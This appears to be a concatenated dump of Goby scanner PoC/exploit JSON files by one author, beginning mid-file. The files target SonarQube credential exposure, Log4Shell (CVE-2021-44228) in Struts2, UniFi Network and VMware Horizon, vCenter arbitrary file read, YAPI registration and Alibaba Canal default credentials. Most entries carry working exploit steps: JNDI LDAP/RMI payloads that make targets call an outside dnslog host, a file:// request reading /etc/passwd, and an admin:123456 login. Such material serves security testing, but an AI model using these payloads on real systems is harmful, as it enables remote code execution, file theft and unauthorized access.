SMTP, SVN, and GitLab credentials via the api/settings/values URI.", 9 | "Product": "SonarQube", 10 | "Homepage": "https://www.sonarqube.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/api/settings/values", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "sonaranalyzer-cs.nuget.packageVersion", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "sonar.core.id", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-29 15:03:58", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /Struts2_Log4Shell_CVE_2021_44228_1.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Struts2 Log4Shell CVE-2021-44228 (1)", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "app=\"Struts2\"", 8 | "Description": "Struts2 Showcase(2.5.27) 存在log4j命令执行漏洞,向/struts2-showcase/token/transfer4.action地址发送数据struts.token.name触发。", 9 | "Product": "Struts2", 10 | "Homepage": "https://struts.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:rmi://xxxxdnslog.cn/tes}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/struts2-showcase/token/transfer4.action", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "struts.token.name='${jndi:rmi://{{{dnstest}}}/tes}'", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [ 72 | { 73 | "type": "item", 74 | "variable": "$code", 75 | "operation": "==", 76 | "value": "200", 77 | "bz": "" 78 | } 79 | ] 80 | }, 81 | "SetVariable": [ 82 | "output|lastbody|regex|" 83 | ] 84 | }, 85 | { 86 | "Request": { 87 | "method": "GET", 88 | "uri": "http://www.dnslog.cn/getrecords.php", 89 | "follow_redirect": false, 90 | "header": null, 91 | "data_type": "text", 92 | "data": "", 93 | "set_variable": [] 94 | }, 95 | "ResponseTest": { 96 | "type": "group", 97 | "operation": "AND", 98 | "checks": [ 99 | { 100 | "type": "item", 101 | "variable": "$code", 102 | "operation": "==", 103 | "value": "200", 104 | "bz": "" 105 | }, 106 | { 107 | "type": "item", 108 | "variable": "$body", 109 | "operation": "contains", 110 | "value": "{{{dnstest}}}", 111 | "bz": "" 112 | } 113 | ] 114 | }, 115 | "SetVariable": [ 116 | "output|lastbody|regex|" 117 | ] 118 | } 119 | ], 120 | "ExploitSteps": [ 121 | "AND", 122 | { 123 | "Request": { 124 | "method": "POST", 125 | "uri": "/struts2-showcase/token/transfer4.action", 126 | "follow_redirect": false, 127 | "header": null, 128 | "data_type": "text", 129 | "data": "struts.token.name='{{{cmd}}}'", 130 | "set_variable": [] 131 | }, 132 | "ResponseTest": { 133 | "type": "group", 134 | "operation": "AND", 135 | "checks": [ 136 | { 137 | "type": "item", 138 | "variable": "$code", 139 | "operation": "==", 140 | "value": "200", 141 | "bz": "" 142 | } 143 | ] 144 | }, 145 | "SetVariable": [ 146 | "output|lastbody|regex|" 147 | ] 148 | } 149 | ], 150 | "PostTime": "2021-12-22 16:09:42", 151 | "GobyVersion": "1.9.310" 152 | } -------------------------------------------------------------------------------- /Struts2_Log4Shell_CVE_2021_44228_3.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Struts2 Log4Shell CVE-2021-44228 (3)", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "app=\"Struts2\"", 8 | "Description": "Struts2 struts2-showcase DefaultActionMapper.java存在log4j漏洞,在url中附带payload即可利用。", 9 | "Product": "Struts2", 10 | "Homepage": "https://struts.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "$%7Bjndi:ldap://xxxxdnslog.cn/tea%7D/" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "GET", 61 | "uri": "/struts2-showcase/$%7Bjndi:ldap://{{{dnstest}}}/tea%7D/", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "GET", 117 | "uri": "/struts2-showcase/{{{cmd}}}", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [ 128 | { 129 | "type": "item", 130 | "variable": "$code", 131 | "operation": "==", 132 | "value": "200", 133 | "bz": "" 134 | } 135 | ] 136 | }, 137 | "SetVariable": [ 138 | "output|lastbody||" 139 | ] 140 | } 141 | ], 142 | "PostTime": "2021-12-24 10:43:02", 143 | "GobyVersion": "1.9.310" 144 | } -------------------------------------------------------------------------------- /UniFi_Network_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "UniFi Network Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "( title=\"UniFi Network\")", 8 | "Description": "UniFi Network 存在log4j漏洞。", 9 | "Product": "UniFi Network", 10 | "Homepage": "https://help.ui.com.cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://dnslog.cn/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/api/login", 62 | "follow_redirect": false, 63 | "header": null, 64 | "data_type": "text", 65 | "data": "{\"username\":\"admin\",\"password\":\"lolwat\",\"remember\":\"${jndi:ldap://{{{dnstest}}}/tea}\",\"strict\":true}", 66 | "set_variable": [] 67 | }, 68 | "ResponseTest": { 69 | "type": "group", 70 | "operation": "AND", 71 | "checks": [] 72 | }, 73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "POST", 117 | "uri": "/api/login", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "{\"username\":\"admin\",\"password\":\"lolwat\",\"remember\":\"{{{cmd}}}\",\"strict\":true}", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [] 128 | }, 129 | "SetVariable": [ 130 | "output|lastbody|regex|" 131 | ] 132 | } 133 | ], 134 | "PostTime": "2022-01-11 14:43:16", 135 | "GobyVersion": "1.9.320" 136 | } -------------------------------------------------------------------------------- /VMWare_Horizon_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "VMWare Horizon Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "title=\"VMware Horizon\"", 8 | "Description": "VMWare Horizon 存在log4j漏洞。", 9 | "Product": "VMWare Horizon", 10 | "Homepage": "https://www.vmware.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://dnslog.cn/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "GET", 61 | "uri": "/portal/info.jsp", 62 | "follow_redirect": false, 63 | "header": { 64 | "Accept-Language": "${jndi:ldap://{{{dnstest}}}/tea}" 65 | }, 66 | "data_type": "text", 67 | "data": "", 68 | "set_variable": [] 69 | }, 70 | "ResponseTest": { 71 | "type": "group", 72 | "operation": "AND", 73 | "checks": [] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|" 77 | ] 78 | }, 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "http://www.dnslog.cn/getrecords.php", 83 | "follow_redirect": false, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "==", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "{{{dnstest}}}", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "ExploitSteps": [ 115 | "AND", 116 | { 117 | "Request": { 118 | "method": "GET", 119 | "uri": "/portal/info.jsp", 120 | "follow_redirect": false, 121 | "header": { 122 | "Accept-Language": "{{{cmd}}}" 123 | }, 124 | "data_type": "text", 125 | "data": "", 126 | "set_variable": [] 127 | }, 128 | "ResponseTest": { 129 | "type": "group", 130 | "operation": "AND", 131 | "checks": [] 132 | }, 133 | "SetVariable": [ 134 | "output|lastbody|regex|" 135 | ] 136 | } 137 | ], 138 | "PostTime": "2022-01-06 10:19:34", 139 | "GobyVersion": "1.9.320" 140 | } -------------------------------------------------------------------------------- /VMware_vCenter_v7.0.2_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "VMware vCenter v7.0.2 Arbitrary File Read", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "app=\"VMware-vCenter\"", 8 | "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", 9 | "Product": "VMware-vCenter", 10 | "Homepage": "https://www.vmware.com/products/vcenter-server.html", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/l0ggg/VMware_vCenter" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "root:x:", 57 | "bz": "" 58 | }, 59 | { 60 | "type": "item", 61 | "variable": "$body", 62 | "operation": "contains", 63 | "value": "bin:x:", 64 | "bz": "" 65 | } 66 | ] 67 | }, 68 | "SetVariable": [ 69 | "output|lastbody|regex|" 70 | ] 71 | } 72 | ], 73 | "ExploitSteps": [ 74 | "AND", 75 | { 76 | "Request": { 77 | "method": "GET", 78 | "uri": "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://{{{Path}}}", 79 | "follow_redirect": false, 80 | "header": null, 81 | "data_type": "text", 82 | "data": "", 83 | "set_variable": [] 84 | }, 85 | "ResponseTest": { 86 | "type": "group", 87 | "operation": "AND", 88 | "checks": [ 89 | { 90 | "type": "item", 91 | "variable": "$code", 92 | "operation": "==", 93 | "value": "200", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-12-02 18:50:55", 104 | "GobyVersion": "1.9.310" 105 | } -------------------------------------------------------------------------------- /YAPI_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "YAPI RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", 8 | "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", 9 | "Product": "YAPI", 10 | "Homepage": "https://github.com/YMFE/yapi", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/api/user/reg", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "禁止注册,请联系管理员", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "邮箱不能为空", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-12-01 20:34:40", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /alibaba_canal_default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "alibaba canal default password", 3 | "Level": "3", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", 8 | "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456", 9 | "Product": "Remote attacker can use this default to control the system", 10 | "Homepage": "https://github.com/alibaba/canal", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "POST", 26 | "uri": "/api/v1/user/login", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "com.alibaba.otter.canal.admin.controller.UserController.login", 49 | "bz": "" 50 | } 51 | ] 52 | }, 53 | "SetVariable": [ 54 | "output|lastbody|regex|" 55 | ] 56 | }, 57 | { 58 | "Request": { 59 | "method": "POST", 60 | "uri": "/api/v1/user/login", 61 | "follow_redirect": false, 62 | "header": { 63 | "Content-Type": "application/json" 64 | }, 65 | "data_type": "text", 66 | "data": "{\"username\":\"admin\",\"password\":\"123456\"}", 67 | "set_variable": [] 68 | }, 69 | "ResponseTest": { 70 | "type": "group", 71 | "operation": "AND", 72 | "checks": [ 73 | { 74 | "type": "item", 75 | "variable": "$code", 76 | "operation": "==", 77 | "value": "200", 78 | "bz": "" 79 | }, 80 | { 81 | "type": "item", 82 | "variable": "$body", 83 | "operation": "contains", 84 | "value": "{\"code\":20000,", 85 | "bz": "\"data\":{\"token\"" 86 | } 87 | ] 88 | }, 89 | "SetVariable": [ 90 | "output|lastbody|regex|" 91 | ] 92 | } 93 | ], 94 | "ExploitSteps": [ 95 | "AND", 96 | { 97 | "Request": { 98 | "method": "GET", 99 | "uri": "/test.php", 100 | "follow_redirect": true, 101 | "header": null, 102 | "data_type": "text", 103 | "data": "", 104 | "set_variable": [] 105 | }, 106 | "ResponseTest": { 107 | "type": "group", 108 | "operation": "AND", 109 | "checks": [ 110 | { 111 | "type": "item", 112 | "variable": "$code", 113 | "operation": "==", 114 | "value": "200", 115 | "bz": "" 116 | }, 117 | { 118 | "type": "item", 119 | "variable": "$body", 120 | "operation": "contains", 121 | "value": "test", 122 | "bz": "" 123 | } 124 | ] 125 | }, 126 | "SetVariable": [ 127 | "output|lastbody|regex|" 128 | ] 129 | } 130 | ], 131 | "PostTime": "2021-10-31 17:23:05", 132 | "GobyVersion": "1.8.302" 133 | } --------------------------------------------------------------------------------